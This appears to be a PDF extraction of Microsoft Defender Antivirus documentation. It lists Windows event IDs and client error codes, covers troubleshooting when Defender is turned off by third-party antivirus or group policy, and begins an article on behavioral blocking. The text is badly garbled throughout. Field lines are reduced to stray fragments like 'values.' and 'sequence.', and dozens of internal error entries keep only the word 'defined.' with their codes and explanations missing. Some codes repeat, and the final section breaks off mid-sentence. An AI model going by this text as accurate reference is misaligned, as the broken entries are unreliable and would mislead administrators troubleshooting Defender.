Operating system version: Windows Vista (Service Pack 1, or Service Pack

2), Windows 7 and later
- Operating system: Server Operating System
Operating system version: Windows Server 2008, Windows Server 2008 R2,
Windows Server 2012, and Windows Server 2016
User action: No action is necessary. Microsoft Defender Antivirus removed or

quarantined a threat.
Event ID 1118
Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_FAILED
Message: The antimalware platform attempted to perform an action to protect your

system from malware or other potentially unwanted software, but the action failed.
Description: Microsoft Defender Antivirus encountered a noncritical error when taking

action on malware or other potentially unwanted software. For more information, see
the following details:
Name: Threat name
ID: Threat ID
Path: File path


Dynamic signature

controls.
sequence.
Remote attestation

User: Domain\User
Allow: The resource was allowed to execute/exist
Block: The resource was blocked from executing
Action Status: Description of additional actions
values.
User action: No action is necessary. Microsoft Defender Antivirus failed to complete a

task related to the malware remediation. This isn't a critical failure.
Event ID 1119
Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_CRITICALLY_FAILED
Message: The antimalware platform encountered a critical error when trying to take
action on malware or other potentially unwanted software. There are more details in the
event message.
Description: Microsoft Defender Antivirus encountered a critical error when taking

action on malware or other potentially unwanted software. For more information, see
the following details:
Name: Threat name
ID: Threat ID
Path: File path


Dynamic signature

controls.
sequence
Remote attestation

User: Domain\User
Clean: The resource was cleaned
Action Status: Description of other actions
values.
User action: The Microsoft Defender Antivirus client encountered this error due to
critical issues. The endpoint might not be protected. Review the error description then
follow the relevant User action steps.
Action: Remove User action: Update the definitions then verify that the removal
was successful.
Action: Clean User action: Update the definitions then verify that the remediation
was successful.
Action: Quarantine User action: Update the definitions and verify that the user has
permission to access the necessary resources.
Action: Allow User action: Verify that the user has permission to access the
necessary resources.
If this event persists:
Run the scan again.
If it fails in the same way, go to the Microsoft Support site , enter the error
number in the Search box to look for the error code.
Contact Microsoft Technical Support.
Event ID 1120
Symbolic name: MALWAREPROTECTION_THREAT_HASH
Message: Microsoft Defender Antivirus deduced the hashes for a threat resource.
Description: Microsoft Defender Antivirus client is up and running in a healthy state.
Current Platform Version: Current platform version
Threat Resource Path: Path
Hashes: Hashes
Note: This event will only be logged if the following policy is set: ThreatFileHashLogging
unsigned.
Event ID 1121
Message: Event when an attack surface reduction rule fires in block mode.
Description:
Threat Resource Path: Path
Hashes: Hashes
Event ID 1127
Symbolic name: MALWAREPROTECTION_FOLDER_GUARD_SECTOR_BLOCK
Message: Controlled Folder Access(CFA) blocked an untrusted process from making

changes to the memory.
Description: Controlled Folder Access blocked an untrusted process from potentially
modifying disk sectors. For more information about the event record, see the following
details:
EventID: EventID. Examples: 1127
Version: Version. Examples: 0
Level: Level. Examples: win: Warning
TimeCreated: SystemTime, time when the event was created.
EventRecordID: EventRecordID, index number of the event in the event log
Execution ProcessID: Execution ProcessID, process that generated the event
Channel: Event channel. Examples: Microsoft-Windows-Windows

Defender/Operational
Computer: Computer name
Security UserID: Security UserID
Product Name: Product Name. Examples: Microsoft Defender Antivirus
Product Version: Product Version
Detection Time: Detection Time, time when CFA blocked an untrusted process
User: Domain\User
Path: Device name, name of the device or disk that an untrusted process accessed
for modification
Process Name: Process path, the process path name that CFA blocked from
accessing the device or disk for modification
Security Intelligence Version: Security intelligence version
User action: The user can add the blocked process to the Allowed Process list for CFA,
using PowerShell or Windows Security Center.
Event ID 1150
Symbolic name: MALWAREPROTECTION_SERVICE_HEALTHY
Message: If your antimalware platform reports status to a monitoring platform, this
event indicates that the antimalware platform is running and in a healthy state.
Description: Microsoft Defender Antivirus client is up and running in a healthy state.
Platform Version: Current platform version
User action: No action is necessary. The Microsoft Defender Antivirus client is in a

healthy state. This event is reported on an hourly basis.
Event ID 1151
Symbolic name: MALWAREPROTECTION_SERVICE_HEALTH_REPORT
Message: Endpoint Protection client health report (time in UTC)
Description: Antivirus client health report.
Platform Version: Current platform version
Network Realtime Inspection engine version: Network Realtime Inspection engine

version
Antivirus signature version: Antivirus signature version
Antispyware signature version: Antispyware signature version
Network Realtime Inspection signature version: Network Realtime Inspection

signature version
RTP state: Realtime protection state (Enabled or Disabled)
OA state: On Access state (Enabled or Disabled)
IOAV state: IE Downloads and Outlook Express Attachments state (Enabled or

Disabled)
BM state: Behavior Monitoring state (Enabled or Disabled)
Antivirus signature age: Antivirus signature age (in days)

Antispyware signature age: Antispyware signature age (in days)
Last quick scan age: Last quick scan age (in days)
Last full scan age: Last full scan age (in days)
Antivirus signature creation time: Antivirus signature creation time
Antispyware signature creation time: Antispyware signature creation time
Last quick scan start time: Last quick scan start time
Last quick scan end time: Last quick scan end time
Last quick scan source: Last quick scan source (0 = scan didn't run, 1 = user
initiated, 2 = system initiated)
Last full scan start time: Last full scan start time
Last full scan end time: Last full scan end time
Last full scan source: Last full scan source (0 = scan didn't run, 1 = user initiated, 2
= system initiated)
Product status: For internal troubleshooting
Event ID 2000
Symbolic name: MALWAREPROTECTION_SIGNATURE_UPDATED
Message: The antimalware definitions updated successfully.
Description: Antivirus signature version was updated.
Current Signature Version: Current signature version
Previous Signature Version: Previous signature version
Signature Type: Signature type. Examples: Antivirus, Antispyware, Antimalware, or

Network Inspection System
Update Type: Update type, either Full or Delta.
User: Domain\User
Current Engine Version: Current engine version
Previous Engine Version: Previous engine version

healthy state. This event is reported when signatures are successfully updated.
Event ID 2001
Symbolic name: MALWAREPROTECTION_SIGNATURE_UPDATE_FAILED
Message: The security intelligence update failed.
Description: Microsoft Defender Antivirus encountered an error trying to update

signatures.
New security intelligence version: New version number
Previous security intelligence version: Previous version
Update Source: Update source. Examples:
Security intelligence update folder
Internal security intelligence update server
Microsoft Update Server
File share
Microsoft Malware Protection Center (MMPC)
Update Stage: Update stage. Examples: Search, Download, or Install
Source Path: File share name for Universal Naming Convention (UNC), server name
for Windows Server Update Services (WSUS)/Microsoft Update/ADL.

Update Type: Update type, either Full or Delta.
User: Domain\User
values.
User action: This error occurs when there's a problem updating definitions. To
troubleshoot this event:
Update definitions and force a rescan directly on the endpoint.
Review the entries in the %Windir%\WindowsUpdate.log file for more information

about this error.
Event ID 2002
Symbolic name: MALWAREPROTECTION_ENGINE_UPDATED
Message: The antimalware engine updated successfully.
Description: Microsoft Defender Antivirus engine version was updated.
Engine Type: Engine type, either antimalware engine or Network Inspection System
engine.
User: Domain\User

healthy state. This event is reported when the antimalware engine is successfully
updated.
Event ID 2003
Symbolic name: MALWAREPROTECTION_ENGINE_UPDATE_FAILED
Message: The antimalware engine update failed.
Description: Microsoft Defender Antivirus encountered an error trying to update the

engine.
New Engine Version:

Engine Type: Engine type, either antimalware engine or Network Inspection System
engine.
User: Domain\User
values.
User action: The Microsoft Defender Antivirus client update failed. This event occurs
when the client fails to update itself. This event is due to an interruption in network
connectivity during an update. To troubleshoot this event:
Update definitions and force a rescan directly on the endpoint.
Event ID 2004
Symbolic name: MALWAREPROTECTION_SIGNATURE_REVERSION
Message: There was a problem loading antimalware definition. The antimalware engine
attempts to load the last-known good set of definitions.
Description: Microsoft Defender Antivirus encountered an error trying to load signatures

and will attempt reverting back to a known-good set of signatures.
Signatures Attempted:
values.
Engine Version: Antimalware engine version
User action: The Microsoft Defender Antivirus client attempted to download and install
the latest definitions file and failed. This error can occur when the client encounters an
error while trying to load the definitions, or if the file is corrupt. Microsoft Defender
Antivirus attempts to revert back to a known-good set of definitions. To troubleshoot
this event:
Restart the computer and try again.

Download the latest definitions from the Microsoft Security Intelligence site .
Note: The size of the definitions file downloaded from the site can exceed 60 MB
and shouldn't be used as a long-term solution for updating definitions.
Event ID 2005
Symbolic name: MALWAREPROTECTION_ENGINE_UPDATE_PLATFORMOUTOFDATE
Message: The antimalware engine failed to load because the antimalware platform is out
of date. The antimalware platform loads the last-known good antimalware engine and
attempt to update.
Description: Microsoft Defender Antivirus couldn't load antimalware engine because

current platform version isn't supported. Microsoft Defender Antivirus reverts back to
the last known-good engine and a platform update will be attempted.
Event ID 2006
Symbolic name: MALWAREPROTECTION_PLATFORM_UPDATE_FAILED
Message: The platform update failed.
Description: Microsoft Defender Antivirus encountered an error trying to update the

platform.
values.
Event ID 2007
Symbolic name: MALWAREPROTECTION_PLATFORM_ALMOSTOUTOFDATE
Message: The platform will soon be out of date. Download the latest platform to
maintain up-to-date protection.
Description: Microsoft Defender Antivirus will soon require a newer platform version to
support future versions of the antimalware engine. Download the latest Microsoft
Defender Antivirus platform to maintain the best level of protection available.
Event ID 2010
Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_UPDATED
Message: The antimalware engine used the Dynamic Signature Service to get other
definitions.
Description: Microsoft Defender Antivirus used Dynamic Signature Service to retrieve

more signatures to help protect your machine.

Dynamic Signature Type: Dynamic signature type. Examples: Version, Timestamp,

No limit, or Duration
Persistence Path: Path
Dynamic Signature Version: Version number
Dynamic Signature Compilation Timestamp: Timestamp
Persistence Limit Type: Persistence limit type. Examples: VDM version, Timestamp,
or No limit
Persistence Limit: Persistence limit of the fastpath signature.
Event ID 2011
Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_DELETED
Message: The Dynamic Signature Service deleted the out-of-date dynamic definitions.
Change to default behavior: Change to dynamic signature event reporting default

behavior.
When a dynamic signature is received by MDE, a 2010 event is reported. However, when
the dynamic signature expires or is manually deleted a 2011 event is reported. In some
cases, when a new signature is delivered to MDE sometimes hundreds of dynamic
signatures expire at the same time; therefore hundreds of 2011 events are reported. The
generation of so many 2011 events can cause a Security information and event
management (SIEM) server to become flooded.
To avoid the previously described situation - starting with platform version 4.18.2207.7 -
by default, Defender for Endpoint doesn't report 2011 events:
This new default behavior is controlled by registry entry:

HKLM\SOFTWARE\Microsoft\Windows
Defender\Reporting\EnableDynamicSignatureDroppedEventReporting .
The default value for EnableDynamicSignatureDroppedEventReporting is false, which

means 2011 events aren't reported. If it's set to true, 2011 events are reported.
Because 2010 signature events are timely distributed sporadically - and won't cause a
spike - 2010 signature event behavior is unchanged.
Description: Microsoft Defender Antivirus used Dynamic Signature Service to discard

obsolete signatures.


Removal Reason:
or No limit

healthy state. This event is reported when the Dynamic Signature Service successfully
deletes out-of-date dynamic definitions.
Event ID 2012
Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_UPDATE_FAILED
Message: The antimalware engine encountered an error when trying to use the Dynamic
Signature Service.
Description: Microsoft Defender Antivirus encountered an error trying to use Dynamic

Signature Service.

values.

or No limit
User action: Check your Internet connectivity settings.
Event ID 2013
Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_DELETED_ALL
Message: The Dynamic Signature Service deleted all dynamic definitions.
Description: Microsoft Defender Antivirus discarded all Dynamic Signature Service

signatures.
Event ID 2020
Symbolic name: MALWAREPROTECTION_CLOUD_CLEAN_RESTORE_FILE_DOWNLOADED
Message: The antimalware engine downloaded a clean file.
Description: Microsoft Defender Antivirus downloaded a clean file.
Filename: File name Name of the file.
Event ID 2021
Symbolic name: MALWAREPROTECTION_CLOUD_CLEAN_RESTORE_FILE_DOWNLOAD_FAILED
Message: The antimalware engine failed to download a clean file.
Description: Microsoft Defender Antivirus encountered an error trying to download a

clean file.
Filename: File name Name of the file.
values.
User action: Check your Internet connectivity settings. The Microsoft Defender Antivirus
client encountered an error when using the Dynamic Signature Service to download the
latest definitions to a specific threat. This error is likely caused by a network connectivity
issue.
Event ID 2030
Symbolic name: MALWAREPROTECTION_OFFLINE_SCAN_INSTALLED
Message: The antimalware engine was downloaded and is configured to run offline on
the next system restart.
Description: Microsoft Defender Antivirus downloaded and configured offline antivirus

to run on the next reboot.
Event ID 2031
Symbolic name: MALWAREPROTECTION_OFFLINE_SCAN_INSTALL_FAILED
Message: The antimalware engine was unable to download and configure an offline
scan.
Description: Microsoft Defender Antivirus encountered an error trying to download and

configure offline antivirus.
values.
Event ID 2040
Symbolic name: MALWAREPROTECTION_OS_EXPIRING
Message: Antimalware support for this operating system version will soon end.
Description: The support for your operating system expires shortly. Running Microsoft
Defender Antivirus on an out of support operating system isn't an adequate solution to
protect against threats.
Event ID 2041
Symbolic name: MALWAREPROTECTION_OS_EOL
Message: Antimalware support for this operating system has ended. You must upgrade
the operating system for continued support.
Description: The support for your operating system has expired. Running Microsoft
Defender Antivirus on an out of support operating system isn't an adequate solution to
protect against threats.
Event ID 2042
Symbolic name: MALWAREPROTECTION_PROTECTION_EOL
Message: The antimalware engine no longer supports this operating system, and is no
longer protecting your system from malware.
Description: The support for your operating system has expired. Microsoft Defender
Antivirus is no longer supported on your operating system, has stopped functioning,
and isn't protecting against malware threats.
Event ID 3002
Symbolic name: MALWAREPROTECTION_RTP_FEATURE_FAILURE
Message: Real-time protection encountered an error and failed.
Description: Microsoft Defender Antivirus Real-Time Protection feature encountered an

error and failed.
Feature: Feature. Examples: On Access, Internet Explorer downloads and Microsoft

Outlook Express attachments, Behavior monitoring, or Network Inspection System.
values.
Reason: The reason Microsoft Defender Antivirus real-time protection restarted a

feature.
User action: You should restart the system then run a full scan because it's possible the
system wasn't protected for some time. The Microsoft Defender Antivirus client's real-
time protection feature encountered an error because one of the services failed to start.
If it's followed by a 3007 event ID, the failure was temporary and the antimalware client
recovered from the failure.
Event ID 3007
Symbolic name: MALWAREPROTECTION_RTP_FEATURE_RECOVERED
Message: Real-time protection recovered from a failure. We recommend running a full

system scan when you see this error.
Description: Microsoft Defender Antivirus Real-time Protection restarted a feature. It's

recommended that you run a full system scan to detect any items that might have been
missed while this agent was down.
Feature: Feature. Examples: On Access, IE downloads and Outlook Express

attachments, Behavior monitoring, or Network Inspection System
Reason: The reason Microsoft Defender Antivirus real-time protection restarted a

feature.
User action: The real-time protection feature restarted. If this event happens again,
contact Microsoft Technical Support.
Event ID 5000
Symbolic name: MALWAREPROTECTION_RTP_ENABLED
Message: Real-time protection is enabled.
Description: Microsoft Defender Antivirus real-time protection scanning for malware and
other potentially unwanted software was enabled.
Event ID 5001
Symbolic name: MALWAREPROTECTION_RTP_DISABLED
Message: Real-time protection is disabled.
Description: Microsoft Defender Antivirus real-time protection scanning for malware and
other potentially unwanted software was disabled.
Event ID 5004
Symbolic name: MALWAREPROTECTION_RTP_FEATURE_CONFIGURED
Message: The real-time protection configuration changed.

Description: Microsoft Defender Antivirus real-time protection feature configuration
changed.
Feature: Feature. Examples: On Access, IE downloads and Outlook Express

attachments, Behavior monitoring, or Network Inspection System
Configuration:
Event ID 5007
Symbolic name: MALWAREPROTECTION_CONFIG_CHANGED
Message: The antimalware platform configuration changed.
Description: Microsoft Defender Antivirus configuration changed. If this event is

unexpected, you should review the settings as the event might be the result of malware.
Old value: Old value number Old antivirus configuration value.
New value: New value number New antivirus configuration value.
Event ID 5008
Symbolic name: MALWAREPROTECTION_ENGINE_FAILURE
Message: The antimalware engine encountered an error and failed.
Description: Microsoft Defender Antivirus engine was terminated due to an unexpected

error.
Failure Type: Failure type. Examples: Crash or Hang
Exception Code: Error code
Resource: Resource
User action: To troubleshoot this event:
Try to restart the service.
For antimalware, antivirus and spyware, at an elevated command prompt, type

net stop msmpsvc, and then type net start msmpsvc to restart the antimalware
engine.
For the Network Inspection System, at an elevated command prompt, type net
start nissrv, and then type net start nissrv to restart the Network Inspection
System engine by using the NiSSRV.exe file.
If it fails in the same way, look up the error code by accessing the Microsoft
Support Site and entering the error number in the Search box, and contact
Microsoft Technical Support.
User action: The Microsoft Defender Antivirus client engine stopped due to an
unexpected error. To troubleshoot this event:
Run the scan again.
If it fails in the same way, go to the Microsoft Support site , enter the error
number in the Search box to look for the error code.
Event ID 5009
Symbolic name: MALWAREPROTECTION_ANTISPYWARE_ENABLED
Message: Scanning for malware and other potentially unwanted software is enabled.
Description: Microsoft Defender Antivirus enabled scanning for malware and other
Event ID 5010
Symbolic name: MALWAREPROTECTION_ANTISPYWARE_DISABLED
Message: Scanning for malware and other potentially unwanted software is disabled.
Description: Microsoft Defender Antivirus scanning for malware and other potentially
unwanted software is disabled.
Event ID 5011
Symbolic name: MALWAREPROTECTION_ANTIVIRUS_ENABLED
Message: Scanning for viruses is enabled.
Description: Microsoft Defender Antivirus enabled scanning for viruses.
Event ID 5012
Symbolic name: MALWAREPROTECTION_ANTIVIRUS_DISABLED
Message: Scanning for viruses is disabled.
Description: Microsoft Defender Antivirus scanning for viruses is disabled.
Event ID 5013
Symbolic name: MALWAREPROTECTION_SCAN_CANCELLED
Message: Tamper protection blocked a change to Microsoft Defender Antivirus.
Description: If Tamper protection is enabled then any attempt to change any of

Defender's settings is blocked. Event ID 5013 is generated and states which setting
change was blocked.
Event ID 5100
Symbolic name: MALWAREPROTECTION_EXPIRATION_WARNING_STATE
Message: The antimalware platform expires soon.
Description: Microsoft Defender Antivirus entered a grace period and will soon expire.
After expiration, this program will disable protection against viruses, spyware, and other
Expiration Reason: The reason Microsoft Defender Antivirus expires.
Expiration Date: The date Microsoft Defender Antivirus expires.
Event ID 5101
Symbolic name: MALWAREPROTECTION_DISABLED_EXPIRED_STATE
Message: The antimalware platform is expired.
Description: Microsoft Defender Antivirus grace period has expired. Protection against
viruses, spyware, and other potentially unwanted software is disabled.
values.

Microsoft Defender Antivirus client
error codes
If Microsoft Defender Antivirus experiences any issues, it will usually give you an error
code to help you troubleshoot the issue. Most often an error means there was a
problem installing an update. This section provides the following information about
Microsoft Defender Antivirus client errors.
The error code
The possible reason for the error
Advice on what to do now
Use the following information to help troubleshoot Microsoft Defender Antivirus error
codes.
Error code 0x80508007

Message: ERR_MP_NO_MEMORY
Possible reason: This error indicates that you might have run out of memory.
Resolution:
Check the available memory on your device.
Close any unused applications that are running to free up memory on your device.
Restart the device and run the scan again.
Error code 0x8050800C

Message: ERR_MP_BAD_INPUT_DATA
Possible reason: This error indicates that there might be a problem with your security
product.
Resolution:
Update the definitions. Either:
Get your security intelligence updates in the Windows Security app.

,
Download the latest definitions from the Microsoft Security Intelligence site .
[!NOTE] The size of the definitions file downloaded from the site can exceed 60 MB
and shouldn't be used as a long-term solution for updating definitions.
Run a full scan.
Restart the device and try again.

Message: ERR_MP_BAD_CONFIGURATION
Possible reason: This error indicates that there might be an engine configuration error.
Commonly, this error is related to input data that doesn't allow the engine to function
properly.

Message: ERR_MP_QUARANTINE_FAILED
Possible reason: This error indicates that Microsoft Defender Antivirus failed to
quarantine a threat.

Message: ERR_MP_REBOOT_REQUIRED
Possible reason: This error indicates that a reboot is required to complete threat
removal.

Message: ERR_MP_THREAT_NOT_FOUND
Possible reason: This error indicates that the threat might no longer be present on the
media, or malware might be stopping you from scanning your device.
Resolution: Run the Microsoft Safety Scanner then update your security software and try
again.

Message: ERR_MP_FULL_SCAN_REQUIRED
Possible reason: This error indicates that a full system scan might be required.
Resolution: Run a full system scan.

Message: ERR_MP_MANUAL_STEPS_REQUIRED
Possible reason: This error indicates that manual steps are required to complete threat
removal.
Resolution: Follow the manual remediation steps outlined in the Microsoft Malware
Protection Encyclopedia . You can find a threat-specific link in the event history.

Message: ERR_MP_REMOVE_NOT_SUPPORTED
Possible reason: This error indicates that removal inside the container type might not be
not supported.
Resolution: Microsoft Defender Antivirus isn't able to remediate threats detected inside
the archive. Consider manually removing the detected resources.
Message: ERR_MP_REMOVE_LOW_MEDIUM_DISABLED
Possible reason: This error indicates that removal of low and medium threats might be
disabled.
Resolution: Check the detected threats and resolve them as required.

Message: ERROR_MP_RESCAN_REQUIRED
Possible reason: This error indicates a rescan of the threat is required.
Resolution: Run a full system scan.

Message: ERROR_MP_CALLISTO_REQUIRED
Possible reason: This error indicates that an offline scan is required.
Resolution: Run offline Microsoft Defender Antivirus. For more information, see Help
protect my PC with Microsoft Defender Offline .

Message: ERROR_MP_PLATFORM_OUTDATED
Possible reason: This error indicates that Microsoft Defender Antivirus doesn't support
the current version of the platform and requires a new version of the platform.
Resolution: You can only use Microsoft Defender Antivirus in Windows 10 and Windows
11. For Windows 8, Windows 7 and Windows Vista, you can use System Center Endpoint
Protection.
Internal error codes

The following error codes are used during internal testing of Microsoft Defender
Antivirus.
If you see these errors, you can try to update definitions and force a rescan directly on
the endpoint.

Message displayed: ERROR_MP_NO_INTERNET_CONN
Possible reason for error and resolution: Check your Internet connection, then run the
scan again.

Message displayed: ERROR_MP_UI_CONSOLIDATION_BASE
Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Message displayed: ERROR_MP_ACTIONS_FAILED
defined.

Message displayed: ERROR_MP_NOENGINE
defined.

Message displayed: ERROR_MP_ACTIVE_THREATS
defined.

Message displayed: MP_ERROR_CODE_LUA_CANCELLED
defined.

Message displayed: ERROR_LUA_CANCELLATION
defined.

Message displayed: MP_ERROR_CODE_ALREADY_SHUTDOWN
defined.

Message displayed: MP_ERROR_CODE_RDEVICE_S_ASYNC_CALL_PENDING
defined.

Message displayed: MP_ERROR_CODE_CANCELLED
defined.

Message displayed: MP_ERROR_CODE_NO_TARGETOS
defined.
Message displayed: MP_ERROR_CODE_BAD_REGEXP
defined.

Message displayed: MP_ERROR_TEST_INDUCED_ERROR
defined.

Message displayed: MP_ERROR_SIG_BACKUP_DISABLED
defined.

Message displayed: ERR_MP_BAD_INIT_MODULES
defined.

Message displayed: ERR_MP_BAD_DATABASE
defined.

Message displayed: ERR_MP_BAD_UFS
defined.
Error code 0x8050800C

Message displayed: ERR_MP_BAD_INPUT_DATA
defined.
Error code 0x8050800D

Message displayed: ERR_MP_BAD_GLOBAL_STORAGE
defined.
Error code 0x8050800E

Message displayed: ERR_MP_OBSOLETE
defined.
Error code 0x8050800F

Message displayed: ERR_MP_NOT_SUPPORTED
defined.
Error code 0x8050800F

Message displayed: ERR_MP_NO_MORE_ITEMS
defined.

Message displayed: ERR_MP_NO_MORE_ITEMS
defined.

Message displayed: ERR_MP_DUPLICATE_SCANID
defined.

Message displayed: ERR_MP_BAD_SCANID
defined.

Message displayed: ERR_MP_BAD_USERDB_VERSION
defined.

Message displayed: ERR_MP_RESTORE_FAILED
defined.

Message displayed: ERR_MP_BAD_ACTION
defined.
Message displayed: ERR_MP_NOT_FOUND
defined.

Message displayed: ERR_RELO_BAD_EHANDLE
defined.

Message displayed: ERR_RELO_KERNEL_NOT_LOADED
defined.
Error code 0x8050A001

Message displayed: ERR_MP_BADDB_OPEN
defined.

Message displayed: ERR_MP_BADDB_HEADER
defined.

Message displayed: ERR_MP_BADDB_OLDENGINE
defined.

Message displayed: ERR_MP_BADDB_CONTENT
defined.

Message displayed: ERR_MP_BADDB_NOTSIGNED
defined.

Message displayed: ERR_MP_REMOVE_FAILED
Possible reason for error and resolution: This error is internal. It might be triggered when
malware removal isn't successful.

Message displayed: ERR_MP_SCAN_ABORTED
Possible reason for error and resolution: This error is internal. It might have triggered
when a scan fails to complete.
Feedback

Troubleshoot Microsoft Defender
Antivirus while migrating from a
non-Microsoft solution
FAQ
Applies to:

Platforms
Windows
Use this article to resolve issues while migrating from a non-Microsoft security solution
to Microsoft Defender Antivirus.
Review event logs

1. Open the Event viewer app by selecting the Search icon in the taskbar, and
searching for event viewer.
Information about Microsoft Defender Antivirus can be found under Applications

and Services Logs > Microsoft > Windows > Windows Defender.
2. From there, select Open underneath Operational.
Selecting an event from the details pane shows you more information about an
event in the lower pane, under the General and Details tabs.
Microsoft Defender Antivirus doesn't

start.
This issue can manifest in the form of several different event IDs, all of which have the
same underlying cause.
Associated event IDs

Event ID 15
Log name: Application
Description: Updated Windows Defender status successfully to
SECURITY_PRODUCT_STATE_OFF.
Source: Security Center
Event ID 5007
Log name: Microsoft-Windows-Windows Defender/Operational
Description: Microsoft Defender Antivirus Configuration has changed. If this is an
unexpected event, you should review the settings as this issue could be due to
malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning =
0x1
Source: Windows Defender
Event ID 5010
Log name: Microsoft-Windows-Windows Defender/Operational

Description: Microsoft Defender Antivirus scanning for spyware and other
potentially unwanted software is disabled.
Source: Windows Defender
How to tell if Microsoft Defender Antivirus doesn't start

because a non-Microsoft antivirus is installed.
On a Windows 10 or Windows 11 device, if you aren't using Microsoft Defender for
Endpoint, and you have a non-Microsoft antivirus installed, then Microsoft Defender
Antivirus is automatically turned off. If you're using Microsoft Defender for Endpoint
with a non-Microsoft antivirus installed, Microsoft Defender Antivirus starts in passive
mode, with reduced functionality.
 Tip
The scenario described earlier applies only to Windows 10 and Windows 11. Other
versions of Windows have different responses to Microsoft Defender Antivirus
being run alongside non-Microsoft security software.
Use Services app to check if Microsoft Defender Antivirus is turned
off.
To open the Services app, select the Search icon from the taskbar and search for services.
You can also open the app from the command-line by typing services.msc.
Information about Microsoft Defender Antivirus is listed within the Services app under
Windows Defender > Operational. The antivirus service name is Microsoft Defender
Antivirus Service.
While checking the app, you might see that Microsoft Defender Antivirus Service is set to
manual, but when you try to start this service manually, you get a warning. The warning
might say, The Microsoft Defender Antivirus Service service on Local Computer started and
then stopped. Some services stop automatically if they aren't in use by other services or
programs.
This issue indicates that Microsoft Defender Antivirus was automatically turned off to
preserve compatibility with a non-Microsoft antivirus.
Generate a detailed report
You can generate a detailed report about currently active group policies by opening a
command prompt in Run as admin mode, then entering the following command:
Console
GPresult.exe /h gpresult.html
This command generates a report located at ./gpresult.html. Open this file and you
might see the following results, depending on how Microsoft Defender Antivirus was
turned off.
Group policy results
If security settings are implemented via group policy (GPO) at the

domain or local level, or through System center configuration
manager (SCCM)
Within the GPResults report, under the heading, Windows Components/Microsoft

Defender Antivirus, you might see something like the following entry, indicating that
Microsoft Defender Antivirus is turned off.
Policy: Turn off Microsoft Defender Antivirus
Setting: Enabled
Winning GPO: Win10-Workstations
If security settings are implemented via Group policy preference (GPP)
Under the heading, Registry item (Key path:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender, Value name:
DisableAntiSpyware), you might see something like the following entry, indicating that
Microsoft Defender Antivirus is turned off.
DisableAntiSpyware
Winning GPO: Win10-Workstations
Result: Success
General
Action: Update
Properties
Hive: HKEY_LOCAL_MACHINE
Key path: SOFTWARE\Policies\Microsoft\Windows Defender
Value name: DisableAntiSpyware
Value type: REG_DWORD
Value data: 0x1 (1)
If security settings are implemented via registry key
The report might contain the following text, indicating that Microsoft Defender Antivirus
is turned off:
Registry (regedit.exe)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
DisableAntiSpyware (dword) 1 (hex)
If security settings are set in Windows or your Windows Server image
Your imagining admin might have set the security policy, DisableAntiSpyware, locally via
GPEdit.exe, LGPO.exe, or by modifying the registry in their task sequence. You can
configure a Trusted Image Identifier for Microsoft Defender Antivirus.
Turn Microsoft Defender Antivirus back on

Microsoft Defender Antivirus automatically turns on if no other antivirus is currently
active. You need to turn the non-Microsoft antivirus off to ensure Microsoft Defender
Antivirus can run with full functionality.
２ Warning
Solutions suggesting that you edit the Windows Defender start values for wdboot ,
wdfilter , wdnisdrv , wdnissvc , and windefend in
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services are unsupported, and
might force you to reimage your system.
Passive mode is available if you start using Microsoft Defender for Endpoint and a non-
Microsoft antivirus together with Microsoft Defender Antivirus. Passive mode allows
Microsoft Defender Antivirus to scan files and update itself, but it doesn't remediate
threats in passive mode. In addition, behavior monitoring via Real Time Protection isn't
available in passive mode, unless Endpoint data loss prevention (DLP) is deployed.
Another feature, known as limited periodic scanning, is available to end-users when

Microsoft Defender Antivirus is set to turn off automatically. This feature allows
Microsoft Defender Antivirus to scan files periodically alongside a non-Microsoft
antivirus, using a limited number of detections.
） Important
Limited periodic scanning isn't recommended in enterprise environments. The

detection, management, and reporting capabilities available when running
Microsoft Defender Antivirus in this mode are reduced as compared to active
mode.
 Tip

See also
Microsoft Defender Antivirus compatibility
Microsoft Defender Antivirus in the Windows Security app
Feedback

Article • 02/13/2023
Applies to:

Platforms
Windows
Overview
Today's threat landscape is overrun by fileless malware and that lives off the land, highly
polymorphic threats that mutate faster than traditional solutions can keep up with, and
human-operated attacks that adapt to what adversaries find on compromised devices.
Traditional security solutions aren't sufficient to stop such attacks; you need artificial
intelligence (AI) and device learning (ML) backed capabilities, such as behavioral
blocking and containment, included in Defender for Endpoint.
Behavioral blocking and containment capabilities can help identify and stop threats,
based on their behaviors and process trees even when the threat has started execution.
Next-generation protection, EDR, and Defender for Endpoint components and features
work together in behavioral blocking and containment capabilities.
Behavioral blocking and containment capabilities work with multiple components and
features of Defender for Endpoint to stop attacks immediately and prevent attacks from
progressing.
Next-generation protection (which includes Microsoft Defender Antivirus) can

detect threats by analyzing behaviors, and stop threats that have started running.
Endpoint detection and response (EDR) receives security signals across your
network, devices, and kernel behavior. As threats are detected, alerts are created.
Multiple alerts of the same type are aggregated into incidents, which makes it
easier for your security operations team to investigate and respond.
Defender for Endpoint has a wide range of optics across identities, email, data, and
apps, in addition to the network, endpoint, and kernel behavior signals received
through EDR. A component of Microsoft Defender XDR, Defender for Endpoint
processes and correlates these signals, raises detection alerts, and connects related
alerts in incidents.
With these capabilities, more threats can be prevented or blocked, even if they start
running. Whenever suspicious behavior is detected, the threat is contained, alerts are
created, and threats are stopped in their tracks.
The following image shows an example of an alert that was triggered by behavioral
blocking and containment capabilities:
Components of behavioral blocking and

containment
On-client, policy-driven attack surface reduction rules Predefined common attack
behaviors are prevented from executing, according to your attack surface
reduction rules. When such behaviors attempt to execute, they can be seen in
Microsoft Defender XDR as informational alerts. Attack surface reduction rules
aren't enabled by default; you configure your policies in the Microsoft Defender
portal.
Client behavioral blocking Threats on endpoints are detected through machine

learning, and then are blocked and remediated automatically. (Client behavioral
blocking is enabled by default.)
Feedback-loop blocking (also referred to as rapid protection) Threat detections

are observed through behavioral intelligence. Threats are stopped and prevented
from running on other endpoints. (Feedback-loop blocking is enabled by default.)
Endpoint detection and response (EDR) in block mode Malicious artifacts or

behaviors that are observed through post-breach protection are blocked and
